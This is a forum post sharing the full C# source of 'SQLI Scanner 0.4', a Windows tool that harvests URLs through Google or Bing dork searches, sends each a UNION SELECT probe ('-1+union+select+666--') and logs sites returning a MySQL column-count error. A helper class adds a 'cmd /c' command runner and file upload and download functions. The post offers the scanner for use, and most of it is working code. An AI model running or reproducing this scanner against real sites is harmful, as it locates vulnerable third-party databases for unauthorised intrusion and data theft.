Tema: [C#] SQLI Scanner 0.4 (Leído 3299 veces)
BigBear
[C#] SQLI Scanner 0.4
«
en:
Julio 18, 2014, 01:36:42 am »
Un programa simple en C# para buscar páginas vulnerables a SQLi usando Google o Bing.
Una imagen :
Los códigos:
Form1.cs
Código: C#
// SQLI Scanner 0.4
// (C) Doddy Hackman 2014
using
System
;
using
System.Collections.Generic
;
using
System.ComponentModel
;
using
System.Data
;
using
System.Drawing
;
using
System.Text
;
using
System.Windows.Forms
;
using
System.IO
;
using
System.Text.RegularExpressions
;
namespace
SQLI_Scanner
{
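/// <summary>
/// Main window. Collects candidate URLs from a search engine (button1),
/// requests each one with a fixed probe suffix and lists/logs the ones whose
/// response contains a MySQL column-count error (button2), opens the log
/// (button3) and exits (button4). Double-clicking a list entry opens it in
/// the default browser.
/// </summary>
public partial class Form1 : Form
{
    public Form1()
    {
        InitializeComponent();
    }

    /// <summary>
    /// Runs the search with the text of textBox1/textBox2 and fills listBox1
    /// with the trimmed, de-duplicated results.
    /// </summary>
    private void button1_Click(object sender, EventArgs e)
    {
        listBox1.Items.Clear();

        DH_Tools tools = new DH_Tools();
        funciones funcion = new funciones();

        toolStripStatusLabel1.Text = "[+] Searching ...";
        this.Refresh();

        // Any engine name other than "Bing" falls through to Google.
        List<string> found = comboBox1.Text == "Bing"
            ? funcion.bingsearch(textBox1.Text, textBox2.Text)
            : funcion.googlesearch(textBox1.Text, textBox2.Text);

        // cortar() keeps only entries that have a query parameter and cuts them
        // after the last '='; repes() then drops duplicates.
        List<string> urls = tools.repes(tools.cortar(found));

        foreach (string url in urls)
        {
            listBox1.Items.Add(url);
        }

        if (listBox1.Items.Count == 0)
        {
            MessageBox.Show("Not Found");
        }

        toolStripStatusLabel1.Text = "[+] Search finished";
        this.Refresh();
    }

    /// <summary>
    /// Requests every entry of listBox1 with the probe suffix appended and
    /// records the entries whose response body contains the MySQL
    /// column-count error text.
    /// </summary>
    private void button2_Click(object sender, EventArgs e)
    {
        toolStripStatusLabel1.Text = "[+] Scanning ...";
        this.Refresh();

        listBox2.Items.Clear();

        DH_Tools tools = new DH_Tools();
        String code = "";

        // Snapshot the list so the loop does not enumerate the control directly.
        List<string> urls_to_scan = new List<string>();
        foreach (object write in listBox1.Items)
        {
            urls_to_scan.Add(write.ToString());
        }

        if (listBox1.Items.Count == 0)
        {
            MessageBox.Show("Not Found");
        }
        else
        {
            foreach (string page in urls_to_scan)
            {
                toolStripStatusLabel1.Text = "[+] Checking : " + page;
                this.Refresh();

                // Both the probe suffix and the error text are fixed strings.
                // The match can only succeed when the application returns raw
                // database error messages to the client; toma() returns "" on
                // any request failure, so unreachable pages never match.
                code = tools.toma(page + "-1+union+select+666--");

                Match regex = Regex.Match(
                    code,
                    "The used SELECT statements have a different number of columns",
                    RegexOptions.IgnoreCase);

                if (regex.Success)
                {
                    listBox2.Items.Add(page);
                    // NOTE(review): savefile() appends without a separator, so
                    // consecutive entries run together in the log file.
                    tools.savefile("sqli-logs.txt", page);
                }
            }

            if (listBox2.Items.Count == 0)
            {
                MessageBox.Show("Not Found");
            }
        }

        toolStripStatusLabel1.Text = "[+] Scan Finished";
        this.Refresh();
    }

    /// <summary>Opens sqli-logs.txt if it exists in the working directory.</summary>
    private void button3_Click(object sender, EventArgs e)
    {
        DH_Tools tools = new DH_Tools();

        if (File.Exists("sqli-logs.txt"))
        {
            // Constant file name only: console() hands its argument to "cmd /c".
            tools.console("sqli-logs.txt");
        }
        else
        {
            MessageBox.Show("Logs not found");
        }
    }

    /// <summary>Closes the application.</summary>
    private void button4_Click(object sender, EventArgs e)
    {
        Application.Exit();
    }

    /// <summary>Opens the selected search result in the default browser.</summary>
    private void listBox1_DoubleClick(object sender, EventArgs e)
    {
        OpenSelectedUrl(listBox1);
    }

    /// <summary>Opens the selected scan hit in the default browser.</summary>
    private void listBox2_DoubleClick(object sender, EventArgs e)
    {
        OpenSelectedUrl(listBox2);
    }

    /// <summary>
    /// Opens the selected entry of <paramref name="list"/> in the default
    /// browser, after checking that it is an absolute http/https URL.
    /// </summary>
    /// <remarks>
    /// The entries are scraped from remote HTML, so they are untrusted input.
    /// The previous code built "cmd /c start " + entry, which lets cmd.exe
    /// interpret characters such as '&amp;' or '|' inside the entry as command
    /// separators. Here the value is parsed as a URI and handed to the shell
    /// as a single document name, never as a command line. A double-click
    /// with no selection is ignored instead of throwing.
    /// </remarks>
    private static void OpenSelectedUrl(ListBox list)
    {
        object selected = list.SelectedItem;
        if (selected == null)
        {
            return;
        }

        Uri target;
        bool isWebUrl = Uri.TryCreate(selected.ToString(), UriKind.Absolute, out target)
            && (target.Scheme == Uri.UriSchemeHttp || target.Scheme == Uri.UriSchemeHttps);

        if (!isWebUrl)
        {
            MessageBox.Show("Invalid URL");
            return;
        }

        try
        {
            System.Diagnostics.ProcessStartInfo open =
                new System.Diagnostics.ProcessStartInfo(target.AbsoluteUri);
            open.UseShellExecute = true;

            // Process.Start may return null when an existing process is reused.
            using (System.Diagnostics.Process.Start(open))
            {
            }
        }
        catch (System.ComponentModel.Win32Exception)
        {
            MessageBox.Show("Could not open URL");
        }
    }
}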
}
// The End ?
funciones.cs
Código: C#
// Funciones para SQLI Scanner 0.4
// (C) Doddy Hackman 2014
using
System
;
using
System.Collections.Generic
;
using
System.Text
;
using
System.Net
;
using
System.Text.RegularExpressions
;
using
System.Web
;
namespace
SQLI_Scanner
{
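/// <summary>
/// Result-page scrapers for Bing and Google. Both download result pages over
/// plain HTTP and pull link targets out of the HTML with regular expressions,
/// so everything they return is untrusted remote data.
/// </summary>
class funciones
{
    private const string UserAgent =
        "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";

    /// <summary>
    /// Downloads Bing result pages for <paramref name="dork"/> and returns each
    /// link target cut after its first '='.
    /// </summary>
    /// <param name="dork">Query text; appended to the request URL as-is.</param>
    /// <param name="cantidad">Upper bound for the "first" offset, as text. Offsets
    /// start at 10 and advance by 10.</param>
    /// <returns>The collected entries; empty when <paramref name="cantidad"/> is
    /// not a valid 16-bit integer or is below 10.</returns>
    public List<String> bingsearch(string dork, string cantidad)
    {
        List<string> urls = new List<string>();

        // Parse the bound once. The counter is an int: the original Int16
        // counter wrapped to a negative value for bounds near 32767, which
        // made the loop (and the stream of requests) endless.
        int limite = ParseLimit(cantidad);

        using (WebClient nave = new WebClient())
        {
            nave.Headers["User-Agent"] = UserAgent;

            for (int num = 10; num <= limite; num += 10)
            {
                String code = nave.DownloadString("http://www.bing.com/search?q=" + dork + "&first=" + num);

                Match regex1 = Regex.Match(code, "<h3><a href=\"(.*?)\"", RegexOptions.IgnoreCase);
                while (regex1.Success)
                {
                    String url_cortar = regex1.Groups[1].Value;

                    // Keep only links that carry a parameter, truncated at the first '='.
                    Match regex2 = Regex.Match(url_cortar, "(.*?)=(.*?)", RegexOptions.IgnoreCase);
                    if (regex2.Success)
                    {
                        urls.Add(regex2.Groups[1].Value + "=");
                    }

                    regex1 = regex1.NextMatch();
                }
            }
        }

        return urls;
    }

    /// <summary>
    /// Downloads Google result pages for <paramref name="dork"/> and returns the
    /// unescaped link targets, unwrapping the redirect form when it matches.
    /// </summary>
    /// <param name="dork">Query text; appended to the request URL as-is.</param>
    /// <param name="paginas">Upper bound for the "start" offset, as text. Offsets
    /// start at 10 and advance by 10.</param>
    /// <returns>The collected entries; empty when <paramref name="paginas"/> is
    /// not a valid 16-bit integer or is below 10.</returns>
    public List<String> googlesearch(string dork, string paginas)
    {
        List<string> urlsgoogle = new List<string>();

        // Same bound handling as bingsearch: parsed once, int counter.
        int limite = ParseLimit(paginas);

        using (WebClient nave = new WebClient())
        {
            nave.Headers["User-Agent"] = UserAgent;

            for (int num = 10; num <= limite; num += 10)
            {
                String code = nave.DownloadString("http://www.google.com/search?hl=&q=" + dork + "&start=" + num);

                Match regex = Regex.Match(code, "(?<=\"r\"><. href=\")(.+?)\"", RegexOptions.IgnoreCase);
                while (regex.Success)
                {
                    String leer = Uri.UnescapeDataString(regex.Groups[1].Value);

                    // Use the inner target when the link has the redirect form,
                    // otherwise keep the link unchanged.
                    Match cortada = Regex.Match(leer, @"\/url\?q\=(.*?)\&\;", RegexOptions.IgnoreCase);
                    String lineafinale = cortada.Success ? cortada.Groups[1].Value : leer;

                    urlsgoogle.Add(lineafinale);
                    regex = regex.NextMatch();
                }
            }
        }

        return urlsgoogle;
    }

    // Reads the page bound typed by the user; 0 (no pages) when it is not a
    // valid 16-bit integer, instead of an unhandled FormatException.
    private static int ParseLimit(string texto)
    {
        short valor;
        return short.TryParse(texto, out valor) ? valor : 0;
    }
}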
}
// The End ?
DH_Tools.cs
Código: C#
// Class Name : DH Tools
// Version : Beta
// Author : Doddy Hackman
// (C) Doddy Hackman 2014
//
// Functions :
//
// [+] HTTP Methods GET & POST
// [+] Get HTTP Status code number
// [+] HTTP FingerPrinting
// [+] Read File
// [+] Write File
// [+] GET OS
// [+] Remove duplicates from a List
// [+] Cut urls from a List
// [+] Download
// [+] Upload
// [+] Get Basename from a path
// [+] Execute commands
// [+] URI Split
// [+] MD5 Hash Generator
// [+] Get MD5 of file
// [+] Get IP address from host name
//
// Credits :
//
// Method POST -> https://technet.rapaport.com/Info/Prices/SampleCode/Full_Example.aspx
// Method GET -> http://stackoverflow.com/questions/4510212/how-i-can-get-web-pages-content-and-save-it-into-the-string-variable
// HTTP Headers -> http://msdn.microsoft.com/en-us/library/system.net.httpwebresponse.headers%28v=vs.110%29.aspx
// List Cleaner -> http://forums.asp.net/t/1318899.aspx?Remove+duplicate+items+from+List+String+
// Execute command -> http://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C
// MD5 Hash Generator -> http://www.java2s.com/Code/CSharp/Security/GetandverifyMD5Hash.htm
// Get MD5 of file -> http://stackoverflow.com/questions/10520048/calculate-md5-checksum-for-a-file
//
// Thanks to : $DoC and atheros14 (Forum indetectables)
//
using
System
;
using
System.Collections.Generic
;
using
System.Text
;
using
System.Net
;
using
System.IO
;
using
System.Text.RegularExpressions
;
using
System.Security.Cryptography
;
namespace
SQLI_Scanner
{
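/// <summary>
/// Small collection of HTTP, file, process and hashing helpers. Most methods
/// swallow every exception and signal failure through their return value
/// ("" or "Error"), so callers cannot tell an empty result from an error.
/// </summary>
class DH_Tools
{
    private const string UserAgent =
        "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";

    /// <summary>HTTP GET. Returns the response body, or "" on any failure.</summary>
    public string toma(string url)
    {
        string code = "";
        try
        {
            using (WebClient nave = new WebClient())
            {
                nave.Headers["User-Agent"] = UserAgent;
                code = nave.DownloadString(url);
            }
        }
        catch
        {
            // Deliberate best-effort: callers rely on "" for unreachable URLs.
        }
        return code;
    }

    /// <summary>
    /// HTTP POST of <paramref name="par"/> as application/x-www-form-urlencoded.
    /// Returns the response body, or "" on any failure.
    /// </summary>
    /// <param name="url">Target URL.</param>
    /// <param name="par">Already-encoded form body; sent as ASCII bytes.</param>
    public string tomar(string url, string par)
    {
        string code = "";
        try
        {
            // Encode once; the original encoded the body twice to get its length.
            byte[] cuerpo = Encoding.ASCII.GetBytes(par);

            HttpWebRequest nave = (HttpWebRequest)WebRequest.Create(url);
            nave.UserAgent = UserAgent;
            nave.Method = "POST";
            nave.ContentType = "application/x-www-form-urlencoded";

            using (Stream salida = nave.GetRequestStream())
            {
                salida.Write(cuerpo, 0, cuerpo.Length);
            }

            // Dispose response and reader so the connection is released.
            using (WebResponse respuesta = nave.GetResponse())
            using (StreamReader lector = new StreamReader(respuesta.GetResponseStream()))
            {
                code = lector.ReadToEnd();
            }
        }
        catch
        {
            // Deliberate best-effort: "" signals failure.
        }
        return code;
    }

    /// <summary>
    /// Returns the numeric HTTP status of a GET to <paramref name="url"/> as text.
    /// </summary>
    /// <remarks>
    /// NOTE(review): every failure is reported as "404", including DNS errors,
    /// timeouts and non-404 error statuses that GetResponse raises as exceptions.
    /// </remarks>
    public string respondecode(string url)
    {
        String code = "";
        try
        {
            HttpWebRequest nave = (HttpWebRequest)WebRequest.Create(url);
            nave.UserAgent = UserAgent;

            using (HttpWebResponse num = (HttpWebResponse)nave.GetResponse())
            {
                code = Convert.ToString((int)num.StatusCode);
            }
        }
        catch
        {
            code = "404";
        }
        return code;
    }

    /// <summary>
    /// Returns the response headers of a GET to <paramref name="url"/>, one
    /// "[+] name:value" line per header, or "" on any failure.
    /// </summary>
    public string httpfinger(string url)
    {
        String code = "";
        try
        {
            HttpWebRequest nave1 = (HttpWebRequest)WebRequest.Create(url);

            // using closes the response even if reading a header throws.
            using (HttpWebResponse nave2 = (HttpWebResponse)nave1.GetResponse())
            {
                for (int num = 0; num < nave2.Headers.Count; ++num)
                {
                    code = code + "[+] " + nave2.Headers.Keys[num] + ":" + nave2.Headers[num] + Environment.NewLine;
                }
            }
        }
        catch
        {
            // Deliberate best-effort: whatever was collected so far is returned.
        }
        return code;
    }

    /// <summary>Reads a whole text file. Returns "" when it cannot be read.</summary>
    public string openword(string file)
    {
        String code = "";
        try
        {
            code = System.IO.File.ReadAllText(file);
        }
        catch
        {
            // Deliberate best-effort: "" signals failure.
        }
        return code;
    }

    /// <summary>
    /// Appends <paramref name="texto"/> to <paramref name="file"/> exactly as
    /// given (no line terminator is added). Failures are ignored.
    /// </summary>
    public void savefile(string file, string texto)
    {
        try
        {
            // using closes the file even when Write throws.
            using (System.IO.StreamWriter save = new System.IO.StreamWriter(file, true))
            {
                save.Write(texto);
            }
        }
        catch
        {
            // Deliberate best-effort: logging must not break the caller.
        }
    }

    /// <summary>Returns the OS version string, or "?" on failure.</summary>
    public string getos()
    {
        string code = "";
        try
        {
            System.OperatingSystem os = System.Environment.OSVersion;
            code = Convert.ToString(os);
        }
        catch
        {
            code = "?";
        }
        return code;
    }

    /// <summary>
    /// Returns the distinct entries of <paramref name="array"/> in first-seen order.
    /// </summary>
    public List<string> repes(List<string> array)
    {
        List<string> repe = new List<string>();

        // Set lookup replaces the per-item List.Contains scan (quadratic overall).
        HashSet<string> vistos = new HashSet<string>();

        foreach (string lin in array)
        {
            if (vistos.Add(lin))
            {
                repe.Add(lin);
            }
        }
        return repe;
    }

    /// <summary>
    /// Keeps the entries that contain "?name=value" and returns them cut after
    /// the last '=' that follows the last '?'. Entries without a parameter are dropped.
    /// </summary>
    public List<string> cortar(List<string> otroarray)
    {
        List<string> cort = new List<string>();
        foreach (string row in otroarray)
        {
            Match regex = Regex.Match(row, @"(.*)\?(.*)=(.*)", RegexOptions.IgnoreCase);
            if (regex.Success)
            {
                cort.Add(regex.Groups[1].Value + "?" + regex.Groups[2].Value + "=");
            }
        }
        return cort;
    }

    /// <summary>
    /// Downloads <paramref name="url"/> to the local path <paramref name="savename"/>.
    /// </summary>
    /// <returns>"OK" on success, "Error" on any failure.</returns>
    public string download(string url, string savename)
    {
        String code = "";
        using (WebClient nave = new WebClient())
        {
            nave.Headers["User-Agent"] = UserAgent;
            try
            {
                // savename is used as the destination path exactly as passed in.
                nave.DownloadFile(url, savename);
                code = "OK";
            }
            catch
            {
                code = "Error";
            }
        }
        return code;
    }

    /// <summary>
    /// Uploads the local file <paramref name="archivo"/> to <paramref name="link"/>
    /// with POST.
    /// </summary>
    /// <returns>The response body decoded as UTF-8, or "Error" on any failure.</returns>
    public string upload(string link, string archivo)
    {
        String code = "";
        try
        {
            using (WebClient nave = new WebClient())
            {
                nave.Headers["User-Agent"] = UserAgent;
                byte[] codedos = nave.UploadFile(link, "POST", archivo);
                code = System.Text.Encoding.UTF8.GetString(codedos, 0, codedos.Length);
            }
        }
        catch
        {
            code = "Error";
        }
        return code;
    }

    /// <summary>Returns the file-name part of <paramref name="file"/>.</summary>
    public string basename(string file)
    {
        FileInfo info = new FileInfo(file);
        return info.Name;
    }

    /// <summary>
    /// Runs <paramref name="cmd"/> through "cmd /c" with no window and returns
    /// its standard output, or "Error" when the process cannot be started.
    /// </summary>
    /// <remarks>
    /// SECURITY: the argument is interpreted by the command shell, so
    /// metacharacters such as '&amp;', '|', '&gt;' or '^' inside it are executed
    /// as shell syntax. Pass only constant strings or values that have been
    /// validated by the caller; never pass text taken from downloaded pages,
    /// search results or other remote input.
    /// </remarks>
    public string console(string cmd)
    {
        string code = "";
        try
        {
            System.Diagnostics.ProcessStartInfo loadnow =
                new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
            loadnow.RedirectStandardOutput = true;
            loadnow.UseShellExecute = false;
            loadnow.CreateNoWindow = true;

            // using releases the process handle and the redirected pipe.
            using (System.Diagnostics.Process loadnownow = new System.Diagnostics.Process())
            {
                loadnownow.StartInfo = loadnow;
                loadnownow.Start();
                code = loadnownow.StandardOutput.ReadToEnd();
            }
        }
        catch
        {
            code = "Error";
        }
        return code;
    }

    /// <summary>
    /// Returns one component of <paramref name="url"/>.
    /// </summary>
    /// <param name="url">Absolute URL; an invalid value makes the Uri constructor throw.</param>
    /// <param name="opcion">"host", "port", "path", "file" or "query".</param>
    /// <returns>The component; "Error" when <paramref name="opcion"/> is "",
    /// and "" for any other unrecognised option.</returns>
    public string urisplit(string url, string opcion)
    {
        Uri dividir = new Uri(url);

        switch (opcion)
        {
            case "host":
                return dividir.Host;
            case "port":
                return Convert.ToString(dividir.Port);
            case "path":
                return dividir.LocalPath;
            case "file":
                return new FileInfo(dividir.AbsolutePath).Name;
            case "query":
                return dividir.Query;
            case "":
                return "Error";
            default:
                return "";
        }
    }

    /// <summary>
    /// Returns the MD5 digest of <paramref name="text"/> as 32 lowercase hex digits.
    /// </summary>
    /// <remarks>
    /// MD5 is suitable for non-security checksums only, not for passwords or
    /// integrity checks against tampering.
    /// NOTE(review): the text is encoded with Encoding.Default, which depends on
    /// the runtime and system settings, so digests of non-ASCII text may differ
    /// between machines.
    /// </remarks>
    public string convertir_md5(string text)
    {
        byte[] infovalor;
        using (MD5 convertirmd5 = MD5.Create())
        {
            infovalor = convertirmd5.ComputeHash(Encoding.Default.GetBytes(text));
        }

        StringBuilder guardar = new StringBuilder(infovalor.Length * 2);
        foreach (byte octeto in infovalor)
        {
            guardar.Append(octeto.ToString("x2"));
        }
        return guardar.ToString();
    }

    /// <summary>
    /// Returns the MD5 digest of a file's contents as 32 lowercase hex digits,
    /// or "Error" when the file cannot be read.
    /// </summary>
    public string md5file(string file)
    {
        string code = "";
        try
        {
            // The original never closed the stream, which kept the file open
            // (and locked on Windows) until the garbage collector ran.
            using (MD5 gen = MD5.Create())
            using (FileStream ar = File.OpenRead(file))
            {
                code = BitConverter.ToString(gen.ComputeHash(ar)).Replace("-", "").ToLowerInvariant();
            }
        }
        catch
        {
            code = "Error";
        }
        return code;
    }

    /// <summary>
    /// Resolves <paramref name="host"/> and returns the first address as text,
    /// or "Error" when resolution fails or yields no address.
    /// </summary>
    public string getip(string host)
    {
        string code = "";
        try
        {
            IPAddress[] find = Dns.GetHostAddresses(host);
            code = find[0].ToString();
        }
        catch
        {
            code = "Error";
        }
        return code;
    }
}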
}
// The End ?
Si lo quieren bajar lo pueden hacer de
aca
.